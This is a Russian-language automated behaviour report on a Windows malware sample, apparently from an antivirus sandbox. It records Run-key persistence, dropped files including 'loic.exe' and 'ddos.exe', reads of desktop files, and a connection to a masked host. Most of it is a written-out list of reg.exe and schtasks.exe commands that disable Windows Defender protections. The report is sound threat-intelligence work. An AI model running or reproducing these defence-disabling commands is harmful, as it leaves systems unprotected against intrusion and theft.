Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'winservc.exe' = '%ALLUSERSPROFILE%\winservc.exe'
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\microsoft update manager900994.exe
Вредоносные функции
Для затруднения выявления своего присутствия в системе
блокирует запуск следующих системных утилит:
- Системный антивирус (Защитник Windows)
Читает файлы, отвечающие за хранение паролей сторонними программами
- %HOMEPATH%\desktop\64bit_notes.htm
- %HOMEPATH%\desktop\tileimage.bmp
- %HOMEPATH%\desktop\thlps_keeper_mayer_1965.docx
- %HOMEPATH%\desktop\split.avi
- %HOMEPATH%\desktop\sdszfo.docx
- %HOMEPATH%\desktop\sdkfailsafeemulator.cer
- %HOMEPATH%\desktop\pmd.cer
- %HOMEPATH%\desktop\ituneshelpunavailable.htm
- %HOMEPATH%\desktop\toolbar.bmp
- %HOMEPATH%\desktop\iisstart.htm
- %HOMEPATH%\desktop\dial.bmp
- %HOMEPATH%\desktop\default.bmp
- %HOMEPATH%\desktop\correct.avi
- %HOMEPATH%\desktop\contosoroot_1.cer
- %HOMEPATH%\desktop\contoso.cer
- %HOMEPATH%\desktop\coffee.bmp
- %HOMEPATH%\desktop\adhd_and_obesity.docx
- %HOMEPATH%\desktop\fi51.doc
- %HOMEPATH%\desktop\weeklysheet1215.doc
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\loic.exe
- %TEMP%\costura.discord.net.core.dll.compressed
- %TEMP%\costura.discord.net.rest.dll.compressed
- %TEMP%\costura.discord.net.webhook.dll.compressed
- %TEMP%\costura.dotnetzip.dll.compressed
- %TEMP%\costura.dotnetzip.pdb.compressed
- %TEMP%\costura.leaf.xnet.dll.compressed
- %TEMP%\costura.microsoft.bcl.asyncinterfaces.dll.compressed
- %TEMP%\costura.newtonsoft.json.dll.compressed
- %TEMP%\costura.system.collections.immutable.dll.compressed
- %TEMP%\costura.system.drawing.common.dll.compressed
- %TEMP%\costura.system.interactive.async.dll.compressed
- %TEMP%\costura.system.linq.async.dll.compressed
- %TEMP%\costura.system.runtime.compilerservices.unsafe.dll.compressed
- %TEMP%\costura.system.threading.tasks.extensions.dll.compressed
- %TEMP%\costura.metadata
- %TEMP%\costura.discord webhook.dll.compressed
- %ALLUSERSPROFILE%\winservc.exe
- %TEMP%\costura.costura.pdb.compressed
- %TEMP%\costura.bouncycastle.crypto.dll.compressed
- %TEMP%\runtimesys.exe
- %APPDATA%\loic.exe
- %APPDATA%\ddos.exe
- %TEMP%\config
- %TEMP%\whysosad
- %TEMP%\rtkbtmanserv.exe
- %TEMP%\files
- %TEMP%\bfsvc.cfg
- %TEMP%\xwizard.cfg
- %TEMP%\bfsvc.exe
- %TEMP%\winhlp32.exe
- %TEMP%\hh.exe
- %TEMP%\splwow64.exe
- %TEMP%\xwizard.exe
- %TEMP%\snuvcdsm.exe
- %TEMP%\costura.costura.dll.compressed
- %TEMP%\ss.png
Перемещает следующие файлы
- %TEMP%\whysosad в %TEMP%\dav.bat
- %TEMP%\files в %TEMP%\files.zip
Сетевая активность
Подключается к
- 'ip##ho.net':443
TCP
Другие
- 'ip##ho.net':443
UDP
- DNS ASK ip##ho.net
Другое
Создает и запускает на исполнение
- '%TEMP%\runtimesys.exe'
- '%TEMP%\loic.exe'
- '%APPDATA%\loic.exe'
- '%APPDATA%\ddos.exe'
- '%TEMP%\rtkbtmanserv.exe' ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs5oxPimlu791gYEG0JKAULEjvCVbfe3J7G8YktGz2SHLYnrG+tt1y0+/Kr5iCmY7kccA41mGQqv+u8uWovOKkK9sE12vp4b3/4oUbvTG5qPakiNnHnc+7MUuPbXzXczYfI=
- '%ALLUSERSPROFILE%\winservc.exe'
- '%WINDIR%\syswow64\cmd.exe' /C "%TEMP%\dav.bat"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /C "%TEMP%\dav.bat"
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
- '%WINDIR%\syswow64\reg.exe' delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
- '%WINDIR%\syswow64\reg.exe' delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
- '%WINDIR%\syswow64\reg.exe' delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
- '%WINDIR%\syswow64\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
- '%WINDIR%\syswow64\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
- '%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
- '%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
- '%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
- '%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
- '%WINDIR%\syswow64\schtasks.exe' /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
- '%WINDIR%\syswow64\reg.exe' delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
- '%WINDIR%\syswow64\reg.exe' add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
